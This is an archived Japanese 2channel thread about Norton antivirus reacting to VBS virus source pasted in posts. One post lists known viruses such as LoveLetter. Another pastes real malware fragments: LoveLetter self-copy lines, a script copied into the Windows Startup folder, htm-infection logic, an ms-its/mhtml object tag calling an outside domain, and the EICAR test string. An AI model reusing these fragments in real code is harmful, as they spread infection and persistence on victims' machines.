[過去ログ] ノートンがvbsウィルスのソースに誤反応3 (1002レス)
上下前次1-新
抽出解除 レス栞
このスレッドは過去ログ倉庫に格納されています。
次スレ検索 歴削→次スレ 栞削→次スレ 過去ログメニュー
2(3): 05/03/01 01:59 ID:??? AAS
■既知のvbsウィルスのソース■
・VBS.Internal
出元は2chスレ:downloadだと思われる。
ダウソ板からいろんな板へ飛び火した模様。
・VBS.LoveLetter.A
c.Copy(dirsystem&”LOVE−LETTER−FOR−YOU.TXT.vbs
(反応しないように全角で書いてあります)出元不明。ニュー速から?
一般論として「htm」「html」拡張子などを安易に検索対象から外すことは奨励されません。これを感染ターゲットにするウィルスが数種確認されています。
外部リンク[html]:www.symantec.com
Q.ウイルスコードが貼られているのにノートン反応しない。。。
省7
14(4): 05/03/04 22:18 ID:??? AAS
DAT落ち阻止て神戸♪
>>13
VBS.LoveLetter.Var
2chスレ:pcqa
ウイルスコードが貼られているのにノートン反応しないって人は>>2見てね。
331(2): 2005/10/29(土)01:10 ID:??? AAS
NIS2005を使用しています
Opera8.5で>>2にあるテスト用の外部リンク[txt]:www.eicar.orgを踏んでみたのですがNAVが反応しません。
これはAutoProtectが正常に働いていないということなのでしょうか。
試しにローカルにDLしてみてスキャンをかけてみると、ウィルスだと反応して削除します。
580(1): 2006/06/17(土)22:54 ID:??? AAS
>>2ё
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!外部リンク:www.loadcash.biz type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
省19
上下前次1-新書関写板覧索設栞歴
スレ情報 赤レス抽出 画像レス抽出 歴の未読スレ AAサムネイル
ぬこの手 ぬこTOP 0.450s*